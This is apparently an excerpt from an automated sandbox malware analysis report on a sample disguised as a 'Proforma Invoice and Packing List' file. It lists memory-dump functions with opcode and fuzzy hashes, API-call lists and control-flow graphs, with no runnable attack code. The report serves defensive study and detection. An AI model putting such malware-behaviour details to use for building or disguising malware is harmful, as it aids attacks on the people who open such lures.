                                                                                            • Opcode Fuzzy Hash: 775a1e0e4e27c4b9fc4d9cca13e573624c0cc0983b639ae8939f9797bf9cb698
                                                                                            • Instruction Fuzzy Hash: F5212431300A119FDB189A2AC4A8A2EB3AEFFC97557044079E816CB394CF75EC02CB80
                                                                                            Function 0260D044 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4177951990.000000000260D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0260D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_260d000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 53d27a86b3b8ade2a2412b8cec46243e0db619b05ed1337d3eedb7e74dd87ae6
                                                                                            • Instruction ID: 8b1ed5e4ee8ec2a4ff1dac990876e0636e2c7400299e8147a44b69ab5eb2f0f2
                                                                                            • Opcode Fuzzy Hash: 53d27a86b3b8ade2a2412b8cec46243e0db619b05ed1337d3eedb7e74dd87ae6
                                                                                            • Instruction Fuzzy Hash: A3210071504244EFDB18DF64C9C4F27BBA5EB88314F20C6A9E84E4B392C73AD847DA61
                                                                                            Function 02695649 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fea6d17328687691e31fada456e3bb6ce69e5d0af1ffcb51720d4a86b8aed669
                                                                                            • Instruction ID: 12d136e94be8206a809c753a8c8cc73f9364a19aea25f608d4e569bd588d4829
                                                                                            • Opcode Fuzzy Hash: fea6d17328687691e31fada456e3bb6ce69e5d0af1ffcb51720d4a86b8aed669
                                                                                            • Instruction Fuzzy Hash: F1214331705149AFEF06AF24D85876A3BA6FB88315F1040AAF9068B354DF34DE16CB90
                                                                                            Function 02699761 Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2fc33ff497af8716b88c9db9f56b591e354f799ea8fd05299b25859e4522af59
                                                                                            • Instruction ID: 9547ab60c2cb58ddf5561a59079701b1eceab66b298943ca646228fd68ccdbc5
                                                                                            • Opcode Fuzzy Hash: 2fc33ff497af8716b88c9db9f56b591e354f799ea8fd05299b25859e4522af59
                                                                                            • Instruction Fuzzy Hash: 29216630E02248AFDF04CFA5D654AEEBFBAAF49305F248069E411E6390DB35DA41DF20
                                                                                            Function 026962F0 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36bdb6e4cb29d3cf686405fc16ce4d4836a4c57487b42eb075be7c052237fd16
                                                                                            • Instruction ID: 4db34f4f5ee0c09dd54777cfaf46e55690a0ce046381212d25559b538ece6656
                                                                                            • Opcode Fuzzy Hash: 36bdb6e4cb29d3cf686405fc16ce4d4836a4c57487b42eb075be7c052237fd16
                                                                                            • Instruction Fuzzy Hash: 9A11C631705A119FDB159A29D46892E77AAFFC975631940BAE816CB360CF35DC02CB90
                                                                                            Function 026927F0 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d2783a8e6a2a8915150bd6fbf1c0e230c41a408e4235a196e867633d6c27bcfb
                                                                                            • Instruction ID: dcc3f867098e9dfe5b76a5508bb3ff270ad7df03da89a504f09887e43b35dddd
                                                                                            • Opcode Fuzzy Hash: d2783a8e6a2a8915150bd6fbf1c0e230c41a408e4235a196e867633d6c27bcfb
                                                                                            • Instruction Fuzzy Hash: D921C3B4D052098FCB41DFA9D5945EDBFF1FF09215F1052AAD805B2210EB355A85CFA1
                                                                                            Function 025FD287 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4177868623.00000000025FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_25fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                            • Instruction ID: 1129dbdf42b218f5162fb8af5406ea50d5406d8dceb7609e09c5a5fb4d36d88d
                                                                                            • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                            • Instruction Fuzzy Hash: 1121B176504240DFCB06CF14D9C4B1ABF72FB84314F24C5A9DE490B696C33AD41ACBA2
                                                                                            Function 0269F040 Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5bbadf903375fdfda23729a0ec30568945afca6b6801501c8cae6b2c9894b29b
                                                                                            • Instruction ID: 382ab18a0ba93778e28b94a3e479e2685ada815dc6083c973041a77b6aec31cf
                                                                                            • Opcode Fuzzy Hash: 5bbadf903375fdfda23729a0ec30568945afca6b6801501c8cae6b2c9894b29b
                                                                                            • Instruction Fuzzy Hash: 16114CB0D002099FDB44EFA8D58469EBBF6FB84305F10D9B9D1189B368EB709A459F81
                                                                                            Function 0269F033 Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0282d7ce0ff567ca8575b2e47de738abf61da1f224e22b81a46f75a73a833956
                                                                                            • Instruction ID: 03e32ab67f3074b97eed3104abdc82068a0cbff4e3d8b6cd2176795094270d20
                                                                                            • Opcode Fuzzy Hash: 0282d7ce0ff567ca8575b2e47de738abf61da1f224e22b81a46f75a73a833956
                                                                                            • Instruction Fuzzy Hash: 9621D2B0E0024A9FDB05DFA8D58468EBFF2FB81304F0096E9C1549B369DB709A459B81
                                                                                            Function 02695E98 Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cc8d3cf7e166fb9d4c8cc3fcf5583ef7b0af5f701c7fecc32f1e8aa0fad7fa0
                                                                                            • Instruction ID: 5a12f97aba5e9a2bd7830284f837859d1d137cd0d223d3f7e544824df07d7e72
                                                                                            • Opcode Fuzzy Hash: 3cc8d3cf7e166fb9d4c8cc3fcf5583ef7b0af5f701c7fecc32f1e8aa0fad7fa0
                                                                                            • Instruction Fuzzy Hash: 8901F532B001156FEB12AE549810AAE3BAFEBC9250B05806BF515D7341CE769D129794
                                                                                            Function 02698E9A Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6bbb04545cc00e99283c7d30b15983d0ee8c5bab2f114ad52dd5d86f24ef4d74
                                                                                            • Instruction ID: 40a77c4f8e6451513c6e2577e422fbac5181a2d4f8cea3cd11d568e904a33db0
                                                                                            • Opcode Fuzzy Hash: 6bbb04545cc00e99283c7d30b15983d0ee8c5bab2f114ad52dd5d86f24ef4d74
                                                                                            • Instruction Fuzzy Hash: 270157313002068FDF249A68D8647AE77AAEB84A56B1050A9E00ADB394EF75CD05CB51
                                                                                            Function 0260D03F Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4177951990.000000000260D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0260D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_260d000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction ID: a6415442d17bb46f5549dd345a0e34cfad8bf1849fcb49f2ab9f4e3f2be65bef
                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction Fuzzy Hash: 3111D075504284CFCB15CF50D9C4B16BF61FB44318F24C6A9D8494B792C33AD44ADF51
                                                                                            Function 0269EA09 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1d4670a508b2eac014701b697286f45501bf09cf84318e0a2d47039e945714c
                                                                                            • Instruction ID: d38bc5c3bea7b16299cec2d5a96fe1b70c029052d9ed82da0fb7d1fff32cb7fa
                                                                                            • Opcode Fuzzy Hash: e1d4670a508b2eac014701b697286f45501bf09cf84318e0a2d47039e945714c
                                                                                            • Instruction Fuzzy Hash: E0118074D0020AAFCB41DFA8E4849FEBBB1FB48300F1041A6D914A3315D7755956EF92
                                                                                            Function 0269ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 83cc749d3b99b32bf5a48d5a9b62eda27602d16d822e9e030014445484d8a079
                                                                                            • Instruction ID: 125fabebe5db22011a67bdfb6cd2a25c80b1812d051004447d795dde388011b3
                                                                                            • Opcode Fuzzy Hash: 83cc749d3b99b32bf5a48d5a9b62eda27602d16d822e9e030014445484d8a079
                                                                                            • Instruction Fuzzy Hash: 36F09635300610CB8B156A6ED464A2AB7DEEFC9A59359407AE909CB365EF71DC03C790
                                                                                            Function 02699C2C Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f83dff73b2ebefeed6d58eb9a7901d705a541f423115090ddc448d920c5f8638
                                                                                            • Instruction ID: 666cc0bee27e14ee83f3a6befa924103666ff6f1f3b490f849e22245fde26902
                                                                                            • Opcode Fuzzy Hash: f83dff73b2ebefeed6d58eb9a7901d705a541f423115090ddc448d920c5f8638
                                                                                            • Instruction Fuzzy Hash: A9F01C72A11118DFDF049F699848AAABBA9EB88335F00C126EA1897254E7318A15CB91
                                                                                            Function 026928A3 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1dc5171bb6dc5ae4eca461f64c9d9eaeb0c7b79ed67948b18a55a7537b8a822
                                                                                            • Instruction ID: 3a8072ca34152230e8e024cb717969919b42ddd743722f18a774a55a534035fa
                                                                                            • Opcode Fuzzy Hash: e1dc5171bb6dc5ae4eca461f64c9d9eaeb0c7b79ed67948b18a55a7537b8a822
                                                                                            • Instruction Fuzzy Hash: BCE02636D20326CBC701EBB0AC000EEF734EDD5211B14855BC0A532081EB30220BCBA2
                                                                                            Function 02696739 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8e20a03130584dddd055291701c62a2a8f818fd3c74fb13c98033ae4a47bc03b
                                                                                            • Instruction ID: 55c0ab0c414bce493b699b7f4eb361bceb76302f3fc6f21fccb6786d418037ac
                                                                                            • Opcode Fuzzy Hash: 8e20a03130584dddd055291701c62a2a8f818fd3c74fb13c98033ae4a47bc03b
                                                                                            • Instruction Fuzzy Hash: E7D05B3154C7414FD702B334E8DA5453B27E6C520531597E1D0054A66FDB759C4F9710
                                                                                            Function 026928B0 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 428bac265608ddda812281ae623388a14a81691149d33f22ec87ff3dc3ac8f0d
                                                                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                            • Opcode Fuzzy Hash: 428bac265608ddda812281ae623388a14a81691149d33f22ec87ff3dc3ac8f0d
                                                                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                            Function 02698EF7 Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac74072b9c239918bda3c684ed830cc08505031150f4b588d606ab941e319104
                                                                                            • Instruction ID: b4e0b488d01eb3196f47a974d362b408d2acd789342d5f59a850e60b7ed6073b
                                                                                            • Opcode Fuzzy Hash: ac74072b9c239918bda3c684ed830cc08505031150f4b588d606ab941e319104
                                                                                            • Instruction Fuzzy Hash: 5AC0127320D0242AAA28104E7C80BA3AB4DC3C22F4A211137FA2C97200AC428C8282A4
                                                                                            Function 0269AFAD Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be4db47ee538cc7ceb31fc0b5df80626c043c0c886bd19a2956e884d308751c2
                                                                                            • Instruction ID: 76c3d21c10792282ac8ea7d1504c0947337a09bde5706bb344276bd4dbcb58b8
                                                                                            • Opcode Fuzzy Hash: be4db47ee538cc7ceb31fc0b5df80626c043c0c886bd19a2956e884d308751c2
                                                                                            • Instruction Fuzzy Hash: A2D0673AB40018DFCB049F99E8508DDF7B6FB98221B148117E915A3261C631A925DB54
                                                                                            Function 02696748 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 02575855d6c5ca99bde706e5827a60179d42285d3fbd3a2a6f7631eb450a5a56
                                                                                            • Instruction ID: 220726f54fd13192c4c9286bfdfb0427a947681215096869324bfee7f365af6d
                                                                                            • Opcode Fuzzy Hash: 02575855d6c5ca99bde706e5827a60179d42285d3fbd3a2a6f7631eb450a5a56
                                                                                            • Instruction Fuzzy Hash: 79C01230148B094EC641F765ED99959B72FEBC0200B4086A0A10A0A76EEFB8A8895A94

                                                                                            Non-executed Functions

                                                                                            Function 02696920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                            • API String ID: 0-3001612457
                                                                                            • Opcode ID: f648f4a769e345eaf26badef1785b10c05bf3b91590ba676f0337299c950381a
                                                                                            • Instruction ID: 259a43840aeb9cb8b90295c5206c916bb10d7bcb7a51543fa3bdd250890745e0
                                                                                            • Opcode Fuzzy Hash: f648f4a769e345eaf26badef1785b10c05bf3b91590ba676f0337299c950381a
                                                                                            • Instruction Fuzzy Hash: 7F017C31B403169FCF6C8E2DC544A2577EFAF88A64725456AE446CB3B4DE71DC42C790

                                                                                            Execution Graph

                                                                                            Execution Coverage:9.6%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:64
                                                                                            Total number of Limit Nodes:5
                                                                                            execution_graph 25233 81ad90 25236 81ae78 25233->25236 25234 81ad9f 25237 81ae22 25236->25237 25239 81ae82 25236->25239 25237->25234 25238 81aebc 25238->25234 25239->25238 25240 81b0c0 GetModuleHandleW 25239->25240 25241 81b0ed 25240->25241 25241->25234 25242 81d120 25243 81d166 GetCurrentProcess 25242->25243 25245 81d1b1 25243->25245 25246 81d1b8 GetCurrentThread 25243->25246 25245->25246 25247 81d1f5 GetCurrentProcess 25246->25247 25248 81d1ee 25246->25248 25249 81d22b 25247->25249 25248->25247 25250 81d253 GetCurrentThreadId 25249->25250 25251 81d284 25250->25251 25312 81d770 DuplicateHandle 25313 81d806 25312->25313 25252 814668 25253 81467a 25252->25253 25254 814686 25253->25254 25256 814781 25253->25256 25257 8147a5 25256->25257 25261 814881 25257->25261 25265 814890 25257->25265 25262 8148b7 25261->25262 25263 814994 25262->25263 25269 8144c4 25262->25269 25267 8148b7 25265->25267 25266 814994 25266->25266 25267->25266 25268 8144c4 CreateActCtxA 25267->25268 25268->25266 25270 815920 CreateActCtxA 25269->25270 25272 8159e3 25270->25272 25272->25272 25273 4ad0040 25275 4ad006d 25273->25275 25274 4ad00bc 25274->25274 25275->25274 25279 4ad0208 25275->25279 25284 4ad01d0 25275->25284 25289 4ad01f7 25275->25289 25280 4ad0213 25279->25280 25294 4ad0230 25280->25294 25299 4ad0240 25280->25299 25281 4ad021c 25281->25274 25285 4ad01e3 25284->25285 25285->25274 25287 4ad0230 2 API calls 25285->25287 25288 4ad0240 2 API calls 25285->25288 25286 4ad021c 25286->25274 25287->25286 25288->25286 25290 4ad0213 25289->25290 25292 4ad0230 2 API calls 25290->25292 25293 4ad0240 2 API calls 25290->25293 25291 4ad021c 25291->25274 25292->25291 25293->25291 25295 4ad0265 25294->25295 25304 4ad0398 25295->25304 25308 4ad0381 25295->25308 25296 4ad0275 25296->25281 25300 4ad0265 25299->25300 25302 4ad0398 GetCurrentThreadId 25300->25302 25303 4ad0381 GetCurrentThreadId 25300->25303 25301 4ad0275 25301->25281 25302->25301 25303->25301 25305 4ad03d5 GetCurrentThreadId 25304->25305 25307 4ad040b 25304->25307 25305->25307 25307->25296 25309 4ad03d5 GetCurrentThreadId 25308->25309 25311 4ad040b 25308->25311 25309->25311 25311->25296

                                                                                            Executed Functions

                                                                                            Function 0081D111 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 402 81d111-81d1af GetCurrentProcess 406 81d1b1-81d1b7 402->406 407 81d1b8-81d1ec GetCurrentThread 402->407 406->407 408 81d1f5-81d229 GetCurrentProcess 407->408 409 81d1ee-81d1f4 407->409 411 81d232-81d24d call 81d6f8 408->411 412 81d22b-81d231 408->412 409->408 415 81d253-81d282 GetCurrentThreadId 411->415 412->411 416 81d284-81d28a 415->416 417 81d28b-81d2ed 415->417 416->417
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0081D19E
                                                                                            • GetCurrentThread.KERNEL32 ref: 0081D1DB
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0081D218
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0081D271
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 0089618d069db7723431d2e2f50feec2557f4360c2f17d95f26be0b09f5393b4
                                                                                            • Instruction ID: 50bb56a1f30e1b0ae8b793f68e2b3d1be3d8f25be19747e4173e73304aa3d9de
                                                                                            • Opcode Fuzzy Hash: 0089618d069db7723431d2e2f50feec2557f4360c2f17d95f26be0b09f5393b4
                                                                                            • Instruction Fuzzy Hash: A65154B09003498FDB44DFA9D548BDEBBF5FF48304F20846AE419A7360D734A984CB65
                                                                                            Function 0081D120 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 424 81d120-81d1af GetCurrentProcess 428 81d1b1-81d1b7 424->428 429 81d1b8-81d1ec GetCurrentThread 424->429 428->429 430 81d1f5-81d229 GetCurrentProcess 429->430 431 81d1ee-81d1f4 429->431 433 81d232-81d24d call 81d6f8 430->433 434 81d22b-81d231 430->434 431->430 437 81d253-81d282 GetCurrentThreadId 433->437 434->433 438 81d284-81d28a 437->438 439 81d28b-81d2ed 437->439 438->439
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0081D19E
                                                                                            • GetCurrentThread.KERNEL32 ref: 0081D1DB
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0081D218
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0081D271
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: b0baa4ac37610b74c19530cf14a1d31e7cd79a9ee83a66babab5cfdca2f6c936
                                                                                            • Instruction ID: 0d9c6fb628bb6d91337af421ed38e6942a4e830bc1c1d6e22da503fd33ca77b6
                                                                                            • Opcode Fuzzy Hash: b0baa4ac37610b74c19530cf14a1d31e7cd79a9ee83a66babab5cfdca2f6c936
                                                                                            • Instruction Fuzzy Hash: AE5133B09003499FDB14DFAAD548BDEBBF5FF48304F20846AE419A7260DB74A984CF65
                                                                                            Function 0081AE78 Relevance: 1.7, APIs: 1, Instructions: 232COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 569 81ae78-81ae80 570 81ae22-81ae55 569->570 571 81ae82-81ae97 569->571 583 81ae64-81ae6c 570->583 584 81ae57-81ae62 570->584 573 81aec3-81aec7 571->573 574 81ae99-81aea6 call 81a1ac 571->574 576 81aec9-81aed3 573->576 577 81aedb-81af1c 573->577 581 81aea8 574->581 582 81aebc 574->582 576->577 586 81af29-81af37 577->586 587 81af1e-81af26 577->587 631 81aeae call 81b110 581->631 632 81aeae call 81b120 581->632 582->573 588 81ae6f-81ae74 583->588 584->588 589 81af39-81af3e 586->589 590 81af5b-81af5d 586->590 587->586 592 81af40-81af47 call 81a1b8 589->592 593 81af49 589->593 595 81af60-81af67 590->595 591 81aeb4-81aeb6 591->582 594 81aff8-81b0b8 591->594 597 81af4b-81af59 592->597 593->597 626 81b0c0-81b0eb GetModuleHandleW 594->626 627 81b0ba-81b0bd 594->627 598 81af74-81af7b 595->598 599 81af69-81af71 595->599 597->595 602 81af88-81af91 call 81a1c8 598->602 603 81af7d-81af85 598->603 599->598 607 81af93-81af9b 602->607 608 81af9e-81afa3 602->608 603->602 607->608 609 81afc1-81afce 608->609 610 81afa5-81afac 608->610 617 81aff1-81aff7 609->617 618 81afd0-81afee 609->618 610->609 612 81afae-81afbe call 81a1d8 call 81a1e8 610->612 612->609 618->617 628 81b0f4-81b108 626->628 629 81b0ed-81b0f3 626->629 627->626 629->628 631->591 632->591
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0081B0DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
